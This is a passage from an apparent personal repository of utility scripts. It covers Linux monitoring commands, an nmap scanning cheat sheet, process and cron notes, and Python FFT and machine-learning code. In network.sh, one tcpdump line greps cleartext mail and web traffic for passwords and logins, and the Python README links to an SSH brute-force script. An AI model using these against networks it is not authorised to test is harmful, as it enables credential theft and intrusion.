MemAvailable=$amount 9 | fi 10 | done < /proc/meminfo 11 | printf '%3d\n' $(( (MemTotal-MemAvailable)*100/MemTotal )) 12 | -------------------------------------------------------------------------------- /monitor/monitor_system.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # monitor system, cpu memory io network 4 | # sar command is used to collect, report & save CPU, Memory, I/O usage in Unix 5 | # i.e. CentOS 7, yum install sysstat 6 | # @Usage 7 | # $ ./monitor-system.sh 8 | # 9 | 10 | EVERY=10 11 | TIMES=30 12 | 13 | LOG_PATH="monitor_logs" 14 | 15 | if ! [ -d $LOG_PATH ]; then 16 | mkdir -p $LOG_PATH 17 | fi 18 | 19 | cur_date="`date +%Y%m%d`" 20 | 21 | top_log_path=$LOG_PATH'/top_'$cur_date'.log' 22 | cpu_log_path=$LOG_PATH'/cpu_'$cur_date'.log' 23 | memory_log_path=$LOG_PATH'/memory_'$cur_date'.log' 24 | io_log_path=$LOG_PATH'/io_'$cur_date'.log' 25 | network_log_path=$LOG_PATH'/network_'$cur_date'.log' 26 | 27 | # total performance monitor 28 | top -s $EVERY -n $TIMES >> $top_log_path 2>&1 & 29 | 30 | # cpu monitor 31 | sar $EVERY $TIMES >> $cpu_log_path 2>&1 & 32 | 33 | # memory monitor 34 | vmstat $EVERY $TIMES >> $memory_log_path 2>&1 & 35 | 36 | # IO monitor 37 | iostat $EVERY $TIMES >> $io_log_path 2>&1 & 38 | 39 | # network monitor 40 | sar -n DEV $EVERY $TIMES >> $network_log_path 2>&1 & 41 | -------------------------------------------------------------------------------- /monitor/network.sh: -------------------------------------------------------------------------------- 1 | #/bin/sh 2 | 3 | # check the header of http request 4 | tcpdump -s 1024 -l -A -n host 192.168.9.56 5 | tcpdump -s 1024 -l -A src 192.168.9.56 or dst 192.168.9.56 6 | sudo tcpdump -A -s 1492 dst port 80 7 | 8 | # check host (192.168.0.5) communication 9 | sudo tcpdump -i eth0 src host 192.168.0.5 10 | 11 | # check the tcp packet of eth0 http request 12 | tcpdump -i eth0 port http 13 | tcpdump -i eth0 port http or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|userna me:|password:|login:|pass |user ' 14 | 15 | 16 | # check the packet of tcp, udp, icmp but not ssh 17 | tcpdump -n -v tcp or udp or icmp and not port 22 18 | 19 | 20 | # check the packet of http request 21 | sudo tcpdump -i eth0 port 80 -w - 22 | 23 | # filter the get host header of http response 24 | sudo tcpdump -i en1 -n -s 0 -w - | grep -a -o -E "GET \/.*|Host\: .*" 25 | 26 | # the response packet of DNS query request 27 | sudo tcpdump -i en0 'udp port 53' 28 | 29 | # nmap -sP, Ping echo to scan a subnet 30 | nmap -sP 192.168.0.1 31 | nmap -sP 192.168.0.0/24 32 | nmap -O www.baidu.com 33 | 34 | # netstat, print network connections, routing tables and interface statistics so on 35 | netstat -a 36 | netstat -nlp 37 | 38 | # netcat to scan ports 39 | nc -z -v -n 172.31.100.7 21-25 40 | 41 | # netcat to connect port 21 42 | nc -v 172.31.100.7 21 43 | 44 | # print routing tables 45 | route 46 | 47 | # tell how long the system has been running, how many users are currently logged on 48 | # and the system load averages for the past 1,5,and 15 minutes. 49 | uptime 50 | 51 | # iftop, display bandwidth usage on an interface by host, i.e. eth1 52 | iftop -i eth1 53 | 54 | # display bandwidth rates in bytes/sec rather than bits/sec 55 | iftop -B 56 | 57 | # don't do hostname lookups 58 | iftop -n 59 | 60 | # don't resolve port number to service names 61 | iftop -N 62 | 63 | # specifies an Ipv4 network for traffic analysis 64 | iftop -F 192.168.1.0/24 or 192.168.1.0/255.255.255.0 65 | 66 | # diplays the current network usage, i.e. eth0 67 | nload -n eth0 68 | 69 | # interactive colorful IP LAN monitor that generates various network statistis including TCP 70 | # info, UDP counts, ICMP and OSPF informa-tion, Ethernet load info, node stats, IP checksum errors, 71 | # and others. More powerful than nload 72 | iptraf 73 | 74 | # ifconfig, configure a network interface 75 | # it is obsolete, for replacement check ip addr and ip link. For statistics use ip -s link. 76 | ifconfig 77 | 78 | 79 | # query or control network driver and hardware settings 80 | ethtool -i eth0 81 | 82 | # statistics devname 83 | ethtool -S 84 | 85 | # set speed in Mb/s. 86 | ethtool speed <10|100|1000> 87 | 88 | 89 | # configure a wireless network interface 90 | iwconfig 91 | iwconfig essid 92 | 93 | #wget 94 | wget -S --spider http://osswin.sourceforge.net/ 2>&1 | grep Mod 95 | 96 | # check mac address 97 | cat /sys/class/net/*/address 98 | 99 | # check ip address of eth0 100 | ifconfig eth0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}' 101 | 102 | # use curl to check the web page's domain name 103 | curl -s http://en.m.wikipedia.org/wiki/List_of_Internet_top-level_domains | sed -n '//{s/<[^>]*>//g;p}' 104 | 105 | #talnet 106 | telnet localhost 6666 107 | 108 | # check all interface 109 | awk '{print $1}' /proc/net/dev|grep :|sed "s/:.*//g" 110 | 111 | # check DNS server verion 112 | nslookup -q=txt -class=CHAOS version.bind NS.PHX5.NEARLYFREESPEECH.NET 113 | -------------------------------------------------------------------------------- /monitor/nmap-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | Nmap Cheat Sheet 2 | ========== 3 | 4 | 5 | ### Nmap Target Selection 6 | 7 | ```sh 8 | #Scan a single IP 9 | nmap 192.168.1.1 10 | 11 | #Scan a host 12 | nmap www.testhostname.com 13 | 14 | #Scan a range of IPs 15 | nmap 192.168.1.1-20 16 | 17 | #Scan a subnet 18 | nmap 192.168.1.0/24 19 | 20 | #Scan targets from a text file 21 | nmap -iL list-of-ips.txt 22 | ``` 23 | 24 | ### Nmap Port Selection 25 | 26 | ```sh 27 | #Scan a single Port 28 | nmap -p 22 192.168.1.1 29 | 30 | #Scan a range of ports 31 | nmap -p 1-100 192.168.1.1 32 | 33 | #Scan 100 most common ports (Fast) 34 | nmap -F 192.168.1.1 35 | 36 | #Scan all 65535 ports 37 | nmap -p- 192.168.1.1 38 | ``` 39 | 40 | ### Nmap Port Scan types 41 | 42 | ```sh 43 | #Scan using TCP connect 44 | nmap -sT 192.168.1.1 45 | 46 | #Scan using TCP SYN scan (default) 47 | nmap -sS 192.168.1.1 48 | 49 | #Scan UDP ports 50 | nmap -sU -p 123,161,162 192.168.1.1 51 | 52 | #Scan selected ports - ignore discovery 53 | nmap -Pn -F 192.168.1.1 54 | ``` 55 | 56 | ### Service and OS Detection 57 | 58 | ```sh 59 | #Detect OS and Services 60 | nmap -A 192.168.1.1 61 | 62 | #Standard service detection 63 | nmap -sV 192.168.1.1 64 | 65 | #More aggressive Service Detection 66 | nmap -sV --version-intensity 5 192.168.1.1 67 | 68 | #Lighter banner grabbing detection 69 | nmap -sV --version-intensity 0 192.168.1.1 70 | ``` 71 | 72 | ### Nmap Output Formats 73 | 74 | ```sh 75 | #Save default output to file 76 | nmap -oN outputfile.txt 192.168.1.1 77 | 78 | #Save results as XML 79 | nmap -oX outputfile.xml 192.168.1.1 80 | 81 | #Save results in a format for grep 82 | nmap -oG outputfile.txt 192.168.1.1 83 | 84 | #Save in all formats 85 | nmap -oA outputfile 192.168.1.1 86 | ``` 87 | 88 | ### Digging deeper with NSE Scripts 89 | 90 | ```sh 91 | #Scan using default safe scripts 92 | nmap -sV -sC 192.168.1.1 93 | 94 | #Get help for a script 95 | nmap --script-help=ssl-heartbleed 96 | 97 | #Scan using a specific NSE script 98 | nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1 99 | 100 | #Scan with a set of scripts 101 | nmap -sV --script=smb* 192.168.1.1 102 | ``` 103 | 104 | The option --script-help=$scriptname will display help for the individual scripts. To get an easy list of the installed scripts try locate nse | grep script. 105 | 106 | You will notice I have used the -sV service detection parameter. Generally most NSE scripts will be more effective and you will get better coverage by including service detection. 107 | 108 | **A scan to search for DDOS reflection UDP services** 109 | 110 | ```sh 111 | #Scan for UDP DDOS reflectors 112 | nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24 113 | ``` 114 | 115 | UDP based DDOS reflection attacks are a common problem that network defenders come up against. This is a handy Nmap command that will scan a target list for systems with open UDP services that allow these attacks to take place. Full details of the command and the background can be found on the [Sans Institute Blog](https://isc.sans.edu/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193) where it was first posted. 116 | 117 | ### HTTP Service Information 118 | 119 | ```sh 120 | #Gather page titles from HTTP services 121 | nmap --script=http-title 192.168.1.0/24 122 | 123 | #Get HTTP headers of web services 124 | nmap --script=http-headers 192.168.1.0/24 125 | 126 | #Find web apps from known paths 127 | nmap --script=http-enum 192.168.1.0/24 128 | ``` 129 | There are many HTTP information gathering scripts, here are a few that are simple but helpful when examining larger networks. Helps in quickly identifying what the HTTP service is that is running on the open port. Note the http-enum script is particularly noisy. 130 | 131 | ### Detect Heartbleed SSL Vulnerability 132 | 133 | ```sh 134 | #Heartbleed Testing 135 | nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24 136 | ``` 137 | Heartbleed detection is one of the available SSL scripts. It will detect the presence of the well known Heartbleed vulnerability in SSL services. Specify alternative ports to test SSL on mail and other protocols 138 | 139 | **IP Address information** 140 | 141 | ```sh 142 | #Find Information about IP address 143 | nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24 144 | ``` 145 | 146 | Gather information related to the IP address and netblock owner of the IP address. Uses ASN, whois and geoip location lookups. 147 | 148 | ### Reference 149 | 150 | * [Nmap Cheat Sheet](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) -------------------------------------------------------------------------------- /monitor/performance_tool.sh: -------------------------------------------------------------------------------- 1 | # tell how long the system has been running 2 | uptime 3 | 4 | # display linux tasks 5 | top 6 | 7 | # an interactive process viewer for unix 8 | htop 9 | 10 | # report processors related statistics 11 | # -A, display all information 12 | mpstat 13 | 14 | # display CPU statistics of individual CPU (or) Core 15 | mpstat -P ALL 1 16 | 17 | # displays information about the CPU usage, and IO statistics 18 | # -c, displays only the CPU usage 19 | # -d, display only the disk IO 20 | # -n, display only the device and NFS statistics 21 | iostat 22 | 23 | # display the memory usage (including swamp) 24 | # -a, display active and inactive memory information 25 | # -f, display number of forks since last boot 26 | # vmstat 2, to execute every 2 seconds 27 | vmstat 28 | 29 | # display amount of free and used memory in the system 30 | free 31 | 32 | # print network traffic statistics 33 | nicstat -z 1 34 | 35 | # verstatile tool for generating system resource statistics 36 | dstat 1 37 | 38 | # collect, report, or save system activity information 39 | sar 40 | 41 | # display summary statistics for each protocol 42 | netstat -s 43 | 44 | # report statistics for linux tasks 45 | pidstat 1 46 | pidstat -d 1 47 | 48 | # strace, trace system calls and signals 49 | # -ttt, the time printed will include the microseconds and the leading portion will be printed 50 | # as the number of seconds since the epoch. 51 | # -T, Show the time spent in system calls. 52 | # -p, attach to the process with the PID and begin tracing. 53 | strace -tttT -p 12670 54 | 55 | 56 | # tcpdump, dump traffic on a network 57 | tcpdump -nr /tmp/out.tcpdump 58 | 59 | # btrace, perform live tracing for block devices 60 | btrace /dev/sdb 61 | 62 | # iotop, watches IO usage information output 63 | iotop -bod5 64 | 65 | # slabtop, display kernel slab cache information in real time 66 | slabtop -sc 67 | 68 | # configure kernel parameters at runtime 69 | sysctl -a 70 | 71 | # perf, linux profiling with performance counters 72 | # perf stat, obtain event counts 73 | perf stat gzip file1 74 | 75 | # perf record, record events for later reporting 76 | perf record -a -g -F 997 sleep 10 -------------------------------------------------------------------------------- /monitor/process.sh: -------------------------------------------------------------------------------- 1 | 2 | top 3 | 4 | ps 5 | # a=show processes for all users 6 | # u=display the process's user/owner 7 | # x=also show processes not attached to a terminal 8 | ps aux 9 | 10 | ps -f -u www-data 11 | 12 | ## -C search via name 13 | ps -C apache2 14 | 15 | ## --sort according to cpu usage, the top 5, -pcpu descending, pcpu ascending 16 | ps aux --sort=-pcpu | head -5 17 | 18 | ##-f print the layer structure by tree 19 | ps -f --forest -C apache2 20 | 21 | ## show all child processes of parent process 22 | ps -o pid,uname,comm -C apache2 23 | ps --ppid 2359 24 | 25 | ## show all threads of one process 26 | ps -p 3150 -L 27 | 28 | ## show the execution time of process 29 | ps -e -o pid,comm,etime 30 | 31 | ## monitor "ps" 32 | watch -n 1 'ps -e -o pid,uname,cmd,pmem,pcpu --sort=-pmem,-pcpu | head -15' 33 | 34 | ## pstree, list the current process and tree structure 35 | pstree 36 | 37 | ## While running a job you can Shortcut 38 | ## suspend a jobs ctrl -z 39 | ## terminate a job ctrl -c 40 | ## Function Command 41 | ## Move a suspended job to the foreground fg 42 | ## Continue a suspended job in the background bg 43 | ## List all jobs jobs 44 | ## Kill a job (%N where N is the job number) kill %N && fg 45 | ## Start a job directly in the background command & 46 | jobs 47 | 48 | ## check the background process 49 | jobs -p 50 | 51 | ## kill 12 job number 52 | kill 12 53 | 54 | ## SIGNINT 2,kill 123, same with Ctrl + C 55 | kill -2 123 56 | 57 | ##SIGKILL(9), forcefully terminate 58 | kill -9 123 59 | 60 | ## kill peidalinux 61 | kill -u peidalinux 62 | kill -9 $(ps -ef | grep peidalinux) 63 | 64 | ## move 123 to the foreground 65 | fg 123 66 | 67 | ## continue 123 in the background 68 | bg 123 69 | 70 | ## when you execute a job in bg, and logout from the session, your process will get killed. 71 | ## you can avoid this use serveral methods: 72 | ## executing the job with nohup, or making it as batch job using at, batch or cron command. 73 | 74 | ## Nohup stands for no hang up. the standard output will be redirected to nohup.out file 75 | nohup command > myout.file 2>&1 & 76 | 77 | ## to submit a job with the `at` command, first enter: 78 | ##at runtime 79 | at 12:00 //executes command at 12:00 80 | 81 | ## lists the user's pending jobs, unless the user is the superuser 82 | atq 83 | 84 | ## delete jobs, identified by their job number 85 | atrm 1 //delete 1 86 | 87 | ## nice is used to invoke a utility or shell script with a particular priority. 88 | ## a niceness of -20 is the highest and 19 is the lowest priority. 89 | ## the default niceness for precesses is inherited from its parent prcess and is usually 0 90 | nice [-n ][--help][--version][command] 91 | nice -n 5 ls 92 | 93 | ## sleep command 94 | date;sleep 1m;date 95 | 96 | ## renice alters the schedulint priority of a running process. 97 | renice 16 -p 13245 //13245: old priority 10, new priority 16 98 | 99 | ## pmap, report memory map of a process, pmap PID 100 | pmap 20367 101 | 102 | 103 | ## crontab is a list of commands that you want to run on a regular schedule, 104 | ## and also the name of the command used to manage that list. 105 | 106 | ## crontab job scheduler 107 | ## *  *  *  *  *  command 108 | ## m h dom mon dow command 109 | ## m, 1~59, minute of the hour 110 | ## h, 1~23, the hour of day 111 | ## dom, 1~31, the day of month 112 | ## mon, 1~12, the month of the year 113 | ## dow, 0~6, the day of the week 114 | ## command, which is the command to be run. 115 | 116 | ## For example, you can run a backup of all your user accounts 117 | ## at 5 a.m every week with: 118 | ## 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ 119 | 120 | ## to edit the crontab, use this command, this will open in vi or vim 121 | crontab -e 122 | 123 | ## remove your crontab so that there no jobs are ever executed by cron 124 | crontab -r 125 | 126 | ## display the current crontab 127 | crontab -l 128 | 129 | ## More examples 130 | ## Run the shell script /home/melissa/backup.sh on January 2 at 6:15 A.M. 131 | 15 6 2 1 * /home/melissa/backup.sh 132 | 133 | ## every night 21:30 restart apache 134 | 30 21 * * * /usr/local/etc/rc.d/lighttpd restart 135 | 136 | ## 1st, 10 and 22 each month 4:45 restart apache 137 | 45 4 1,10,22 * * /usr/local/etc/rc.d/lighttpd restart 138 | 139 | ## every Sat, Sun 1:10 restart apache 140 | 10 1 * * 6,0 /usr/local/etc/rc.d/lighttpd restart 141 | 142 | ## every day,from 18:00 through 23:00,every 30 minutes restart apache 143 | 0,30 18-23 * * * /usr/local/etc/rc.d/lighttpd restart 144 | 145 | ## every day, from 23:00 through 7:00, every one hour restart apche 146 | * 23-7/1 * * * /usr/local/etc/rc.d/lighttpd restart 147 | 148 | 149 |    -------------------------------------------------------------------------------- /python/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Just another repo of Python scripts and codes 4 | 5 | 6 | Installing packages for python 3.6 7 | 8 | ```sh 9 | python3.6 -m pip install 10 | ``` 11 | 12 | 13 | ## Scripts 14 | 15 | - [Port Scan](portscan.py) 16 | - [Brute force SSH logins using paramiko](ssh-dictionary-attack.py) 17 | - [split dataset](machine-learning/split_dataset.py) 18 | - [Compute Receptive Field](machine-learning/computeReceptiveField.py) 19 | 20 | ## Algorithms 21 | 22 | - [Sort Algorithms](pySorting/README.md) 23 | - [All Algorithms implemented in Python](https://github.com/TheAlgorithms/Python) 24 | - [Fourier Transforms](fourier-transforms/README.md) 25 | - [find length of sequences of identical values in a numpy array (run length encoding)](run-length-encoding/run-length-encoding.md) 26 | - [Smoothed z-score algo (very robust thresholding algorithm)](run-length-encoding/ThresholdingAlgo.py) 27 | - [Noise Reduction](noise-reduction/README.md) 28 | 29 | 30 | 31 | Demo of thresholding algorithm 32 | 33 | ![Alt Text](run-length-encoding/ThresholdingAlgo.gif) 34 | 35 | 36 | 37 | ## Great plots 38 | 39 | ![Alt Text](https://media.giphy.com/media/vFKqnCdLPNOKc/giphy.gif) 40 | -------------------------------------------------------------------------------- /python/fourier-transforms/FFT-Tutorial.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | from scipy.fftpack import fft 4 | from scipy.signal import blackman 5 | 6 | def simple_sine_wave(): 7 | t = np.linspace(0, 2*np.pi, 1000, endpoint=True) 8 | f = 3.0 # frequency in Hz 9 | A = 100.0 # amplitude in Unit 10 | s = A * np.sin(2*np.pi*f*t) # signal 11 | 12 | #plt.plot(t,s) 13 | #plt.xlabel('Time ($s$)') 14 | #plt.ylabel('Amplitude ($Unit$)') 15 | 16 | # do the Discrete Fourier Transform with the FFT 17 | Y = np.fft.fft(s) 18 | # if is perfectly mirrored at the half, 19 | # let's just take the first half 20 | N = len(Y)/2+1 21 | 22 | # it is called the amplitude spectrum of the time 23 | # domain signal and was calculated with Discrete 24 | # Fourier Transform with the Chuck-Norris-Fast FFT 25 | #plt.plot(np.abs(Y[:N])) 26 | 27 | # real physical values for Amplitude and Frequency 28 | dt = t[1] - t[0] 29 | fa = 1.0/dt 30 | # x-axis: the frequency axis of the FFT 31 | X = np.linspace(0, fa/2, N, endpoint=True) 32 | 33 | # y-axis: the amplitude of the FFT signal 34 | # in most implementation, the output Y of the FFT 35 | # is normalized with the number of samples 36 | plt.plot(X, 2.0*(np.abs(Y[:N]))/N) 37 | plt.xlabel('Frequency ($Hz$)') 38 | plt.ylabel('Amplitude ($Unit$)') 39 | 40 | plt.show() 41 | 42 | def fft_windowed_signal(): 43 | t = np.linspace(0, 2*np.pi, 1000, endpoint=True) 44 | f = 3.0 # frequency in Hz 45 | A = 100.0 # amplitude in Unit 46 | s = A * np.sin(2*np.pi*f*t) # signal 47 | 48 | # do the Discrete Fourier Transform with the FFT 49 | Y = np.fft.fft(s) 50 | # if is perfectly mirrored at the half, 51 | # let's just take the first half 52 | N = len(Y)/2+1 53 | 54 | # it is called the amplitude spectrum of the time 55 | # domain signal and was calculated with Discrete 56 | # Fourier Transform with the Chuck-Norris-Fast FFT 57 | #plt.plot(np.abs(Y[:N])) 58 | 59 | # real physical values for Amplitude and Frequency 60 | dt = t[1] - t[0] 61 | fa = 1.0/dt 62 | # x-axis: the frequency axis of the FFT 63 | X = np.linspace(0, fa/2, N, endpoint=True) 64 | 65 | # introduce windowing to eliminate the leakage effect 66 | hann = np.hanning(len(s)) 67 | #hamm = np.hamming(len(s)) 68 | #black = np.blackman(len(s)) 69 | 70 | #plt.plot(t, hann*s) 71 | #plt.xlabel('Time ($s$)') 72 | #plt.ylabel('Amplitude ($Unit$)') 73 | #plt.title('Signal with hanning window function applied') 74 | 75 | Yhann = np.fft.fft(hann*s) 76 | plt.figure(figsize=(7,3)) 77 | plt.subplot(121) 78 | plt.plot(t,s) 79 | plt.title('Time Domain Signal') 80 | plt.ylim(np.min(s)*3, np.max(s)*3) 81 | plt.xlabel('Time ($s$)') 82 | plt.ylabel('Amplitude ($Unit$)') 83 | 84 | plt.subplot(122) 85 | plt.plot(X, 2.0*np.abs(Yhann[:N])/N) 86 | plt.title('Frequency Domain Signal') 87 | plt.xlabel('Frequency ($Hz$)') 88 | plt.ylabel('Amplitude ($Unit$)') 89 | 90 | plt.annotate("FFT", 91 | xy=(0.0, 0.2), xycoords='axes fraction', 92 | xytext=(-0.8, 0.2), textcoords='axes fraction', 93 | size=30, va="center", ha="center", 94 | arrowprops=dict(arrowstyle="simple", 95 | connectionstyle="arc3, rad=0.2")) 96 | plt.tight_layout() 97 | plt.show() 98 | 99 | def sine_fftpack(): 100 | # number of sample points 101 | N = 600 102 | # sample spacing 103 | T = 1.0/800.0 104 | x = np.linspace(0.0, N*T, N) 105 | y = np.sin(50.0*2.0*np.pi*x)+0.5*np.sin(80.0*2.0*np.pi*x) 106 | yf = fft(y) 107 | xf = np.linspace(0.0, 1.0/(2.0*T), N//2) 108 | plt.plot(xf, 2.0/N*np.abs(yf[0:N//2])) 109 | plt.grid() 110 | plt.show() 111 | 112 | def sine_fftpack_windowing(): 113 | # the fft input signal is inherently truncated, this 114 | # truncation can be modelled as multiplication, which 115 | # is the cause of spectral leakage. Windowing the signal 116 | # with a dedicated window function helps mitigate 117 | # spectral leakage. 118 | N = 600 # number of sample point 119 | T = 1.0/800.0 # sample spacing 120 | x = np.linspace(0.0, N*T, N) 121 | y = np.sin(50.0*2.0*np.pi*x)+0.5*np.sin(80.0*2.0*np.pi*x) 122 | yf = fft(y) 123 | w = blackman(N) 124 | ywf = fft(y*w) 125 | xf = np.linspace(0.0, 1.0/(2.0*T), N/2) 126 | plt.semilogy(xf, 2.0/N*np.abs(yf[0:N//2])) 127 | plt.semilogy(xf, 2.0/N*np.abs(ywf[0:N//2])) 128 | plt.legend(['FFT', 'FFT w. window']) 129 | plt.grid() 130 | plt.show() 131 | 132 | def main(): 133 | #simple_sine_wave() 134 | #fft_windowed_signal() 135 | #sine_fftpack() 136 | sine_fftpack_windowing() 137 | 138 | if __name__ == '__main__': 139 | main() -------------------------------------------------------------------------------- /python/fourier-transforms/README.md: -------------------------------------------------------------------------------- 1 | 2 | Fourier Transform 3 | ========== 4 | 5 | 6 | ## FFT Examples in Python 7 | 8 | This tutorial covers step by step, how to perform a Fast Fourier Transform with Python. 9 | 10 | ![FFT](../images/FFT.png) 11 | 12 | Including 13 | 14 | * How to scale the x- and y-axis in the amplitude spectrum 15 | * Leakage Effect 16 | * Windowing 17 | 18 | ### [Take a look at the IPython Notebook](./FFT-Tutorial.ipynb) 19 | 20 | Fourier analysis is a method for expressing a function as a sum of periodic components, and for recovering the signal from those components. When both the function and its Fourier transform are replaced with discretized counterparts, it is called the discrete Fourier transform (DFT). 21 | 22 | - [Some examples](./FFT-Tutorial.py) 23 | 24 | ### Real World Data Example 25 | 26 | From 27 | 28 | ![Vertical Netload Germany 2013](../images/VerticalGridLoadGermany2013.png) 29 | 30 | To 31 | 32 | ![Periods in NetLoad](../images/VerticalGridLoadGermany2013-FFT.png) 33 | 34 | ## Reference 35 | 36 | - [FFT-Python](https://github.com/balzer82/FFT-Python) 37 | -------------------------------------------------------------------------------- /python/images/FFT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/images/FFT.png -------------------------------------------------------------------------------- /python/images/VerticalGridLoadGermany2013-FFT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/images/VerticalGridLoadGermany2013-FFT.png -------------------------------------------------------------------------------- /python/images/VerticalGridLoadGermany2013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/images/VerticalGridLoadGermany2013.png -------------------------------------------------------------------------------- /python/machine-learning/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## CNN 4 | 5 | - [Receptive field arithmetic for Convolutional Neural Networks](https://medium.com/mlreview/a-guide-to-receptive-field-arithmetic-for-convolutional-neural-networks-e0f514068807) -------------------------------------------------------------------------------- /python/machine-learning/computeReceptiveField.py: -------------------------------------------------------------------------------- 1 | # [filter size, stride, padding] 2 | #Assume the two dimensions are the same 3 | #Each kernel requires the following parameters: 4 | # - k_i: kernel size 5 | # - s_i: stride 6 | # - p_i: padding (if padding is uneven, right padding will higher than left padding; "SAME" option in tensorflow) 7 | # 8 | #Each layer i requires the following parameters to be fully represented: 9 | # - n_i: number of feature (data layer has n_1 = imagesize ) 10 | # - j_i: distance (projected to image pixel distance) between center of two adjacent features 11 | # - r_i: receptive field of a feature in layer i 12 | # - start_i: position of the first feature's receptive field in layer i (idx start from 0, negative means the center fall into padding) 13 | 14 | import math 15 | convnet = [[11,4,0],[3,2,0],[5,1,2],[3,2,0],[3,1,1],[3,1,1],[3,1,1],[3,2,0],[6,1,0], [1, 1, 0]] 16 | layer_names = ['conv1','pool1','conv2','pool2','conv3','conv4','conv5','pool5','fc6-conv', 'fc7-conv'] 17 | imsize = 227 18 | 19 | def outFromIn(conv, layerIn): 20 | n_in = layerIn[0] 21 | j_in = layerIn[1] 22 | r_in = layerIn[2] 23 | start_in = layerIn[3] 24 | k = conv[0] 25 | s = conv[1] 26 | p = conv[2] 27 | 28 | n_out = math.floor((n_in - k + 2*p)/s) + 1 29 | actualP = (n_out-1)*s - n_in + k 30 | pR = math.ceil(actualP/2) 31 | pL = math.floor(actualP/2) 32 | 33 | j_out = j_in * s 34 | r_out = r_in + (k - 1)*j_in 35 | start_out = start_in + ((k-1)/2 - pL)*j_in 36 | return n_out, j_out, r_out, start_out 37 | 38 | def printLayer(layer, layer_name): 39 | print(layer_name + ":") 40 | print("\t n features: %s \n \t jump: %s \n \t receptive size: %s \t start: %s " % (layer[0], layer[1], layer[2], layer[3])) 41 | 42 | layerInfos = [] 43 | if __name__ == '__main__': 44 | #first layer is the data layer (image) with n_0 = image size; j_0 = 1; r_0 = 1; and start_0 = 0.5 45 | print ("-------Net summary------") 46 | currentLayer = [imsize, 1, 1, 0.5] 47 | printLayer(currentLayer, "input image") 48 | for i in range(len(convnet)): 49 | currentLayer = outFromIn(convnet[i], currentLayer) 50 | layerInfos.append(currentLayer) 51 | printLayer(currentLayer, layer_names[i]) 52 | print ("------------------------") 53 | layer_name = raw_input ("Layer name where the feature in: ") 54 | layer_idx = layer_names.index(layer_name) 55 | idx_x = int(raw_input ("index of the feature in x dimension (from 0)")) 56 | idx_y = int(raw_input ("index of the feature in y dimension (from 0)")) 57 | 58 | n = layerInfos[layer_idx][0] 59 | j = layerInfos[layer_idx][1] 60 | r = layerInfos[layer_idx][2] 61 | start = layerInfos[layer_idx][3] 62 | assert(idx_x < n) 63 | assert(idx_y < n) 64 | 65 | print ("receptive field: (%s, %s)" % (r, r)) 66 | print ("center: (%s, %s)" % (start+idx_x*j, start+idx_y*j)) 67 | -------------------------------------------------------------------------------- /python/machine-learning/split_dataset.py: -------------------------------------------------------------------------------- 1 | DATA_DIR = "appleoutput40" 2 | SC_DATA_DIR = "split_appleoutput40" 3 | VAL_PERCENTAGE = 0.2 4 | from os.path import normpath, basename 5 | from shutil import copyfile 6 | import random 7 | import os 8 | subdir_imgs = [(subdir, files) for subdir, dirs, files in os.walk(DATA_DIR) if len(files)>50] 9 | 10 | 11 | 12 | for subdir, imgs in subdir_imgs: 13 | random.shuffle(imgs) 14 | class_dir = os.path.basename(os.path.normpath(subdir)) 15 | train_dir = os.path.join(SC_DATA_DIR, "train", class_dir) 16 | val_dir = os.path.join(SC_DATA_DIR, "val", class_dir) 17 | 18 | if not os.path.exists(train_dir): 19 | os.makedirs(train_dir) 20 | if not os.path.exists(val_dir): 21 | os.makedirs(val_dir) 22 | n = len(imgs) 23 | split_point = int((1-VAL_PERCENTAGE)*n) 24 | train_imgs = imgs[:split_point] 25 | val_imgs = imgs[split_point:] 26 | 27 | for img in train_imgs: 28 | copyfile(os.path.join(subdir, img), os.path.join(train_dir, img)) 29 | for img in val_imgs: 30 | copyfile(os.path.join(subdir, img), os.path.join(val_dir, img)) 31 | #for file in files: 32 | # print os.path.join(subdir, file) -------------------------------------------------------------------------------- /python/noise-reduction/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Noise reduction 3 | 4 | 5 | ## total variation denoising 6 | 7 | In signal processing, total variation denoising, also known as total variation regularization, is a process, most often used in digital image processing, that has applications in noise removal. 8 | 9 | It is based on the principle that signals with **excessive and possibly spurious detail have high total variation**, that is, the **integral of the absolute gradient** of the signal is high. 10 | 11 | According to this principle, reducing the total variation of the signal subject to it being a close match to the original signal, **removes unwanted detail whilst preserving important details** such as edges. 12 | 13 | The concept was pioneered by Rudin, Osher, and Fatemi in 1992 and so is today known as the **ROF model**. 14 | 15 | More details: [wikipedia](https://en.wikipedia.org/wiki/Total_variation_denoising) 16 | 17 | I used [proxTV toolbox](https://github.com/albarji/proxTV) in Python to solve this optimization problem. Code from: [here](https://dsp.stackexchange.com/questions/43374/removing-low-frequencies-from-a-signal) 18 | 19 | ```python 20 | import scipy.io as sio 21 | import numpy as np 22 | import matplotlib.pyplot as plt 23 | import prox_tv as ptv 24 | 25 | mat_struct = sio.loadmat('Signal1.mat') 26 | noisy_signal = mat_struct['x'].T[0] 27 | 28 | filtered_signal = ptv.tv1_1d(noisy_signal, 50) 29 | 30 | time_vec = np.linspace(0, len(noisy_signal)/1500., len(noisy_signal)) 31 | 32 | plt.close('all') 33 | 34 | fig, ax = plt.subplots(3,1,sharex=True) 35 | 36 | ax[0].plot(time_vec,noisy_signal) 37 | ax[0].set_title('noisy signal') 38 | 39 | ax[1].plot(time_vec,filtered_signal) 